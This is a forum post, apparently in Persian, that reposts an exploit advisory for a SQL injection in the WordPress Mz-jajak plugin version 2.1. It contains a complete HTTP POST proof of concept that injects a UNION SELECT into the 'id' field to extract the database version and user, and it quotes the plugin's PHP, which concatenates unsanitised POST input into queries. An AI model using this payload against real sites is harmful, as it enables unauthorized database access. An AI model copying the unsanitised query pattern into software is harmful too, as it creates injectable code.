SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability

    [align=LEFT]

    کد:
    # Exploit Title: WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability
    # Date: 2012-08-10
    # Author: StRoNiX
    # E-mail: [email protected]
    # Software Link: http://downloads.wordpress.org/plugin/mz-jajak.zip
    # Version: 2.1 (tested)
     
     
    ---------------
    PoC (POST data)
    ---------------
    POST /index.php HTTP/1.1
    User-Agent: Mozilla
    Host: example.com
    Accept: */*
    Referer: http://example.com/?page_id=9
    Connection: Keep-Alive
    Content-Length: 111
    Content-Type: application/x-www-form-urlencoded
     
    answer=1&formvote=Y&id=1 AND 1=0 UNION ALL SELECT 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15--+&x=10&y=12
     
     
    ---------------
    Vulnerable code
    ---------------
    $id=$_POST['id'];   
    ...
    $query = $wpdb->query("UPDATE " . $table_name . " SET ".$answert."=".$answert."+1 WHERE id=".$id);
    			 }
    			 $rows = $wpdb->get_results("SELECT * FROM " . $table_name . " WHERE id=".$id);
     
     
     
    ###########################################################
    Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0
     
    ----------------------------snip--------------------------------------
     
    Thanks,
    ~StRoNiX
    [/align]
    [align=center][/align]
صبر کنید ..
X